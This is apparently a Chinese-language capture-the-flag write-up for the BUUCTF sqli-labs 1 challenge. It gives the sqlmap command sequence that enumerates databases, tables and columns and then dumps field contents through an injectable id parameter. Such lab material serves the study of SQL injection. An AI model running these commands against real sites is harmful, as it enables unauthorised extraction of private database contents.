BUUCTF-sqli-labs1

BUUCTF-sqli-labs1_第1张图片根据题目内容他让我们(请输入id作为带数值的参数 )
这里面我用了sqlmap工具来进行解题。
在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库
BUUCTF-sqli-labs1_第2张图片这样我们就可以获得数据库中的名称了。
下面我们就要看数据库中的表明了。
python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 BUUCTF-sqli-labs1_第3张图片我们知道了表名,下面我们就要爆出字段名。
python sqlmap.py -u +(网站名)-D 数据库名 -T 表名 --columns #列出字段 。

BUUCTF-sqli-labs1_第4张图片 python sqlmap.py -u +(网站名)-D 数据库名 -T 表名 -C 字段名1,字段名2,…… --dump #获取字段内容
BUUCTF-sqli-labs1_第5张图片https://www.cnblogs.com/iAmSoScArEd/articles/9263735.html(这个网站里面有sqlmap的语法)

你可能感兴趣的:(sqli-labs,sql)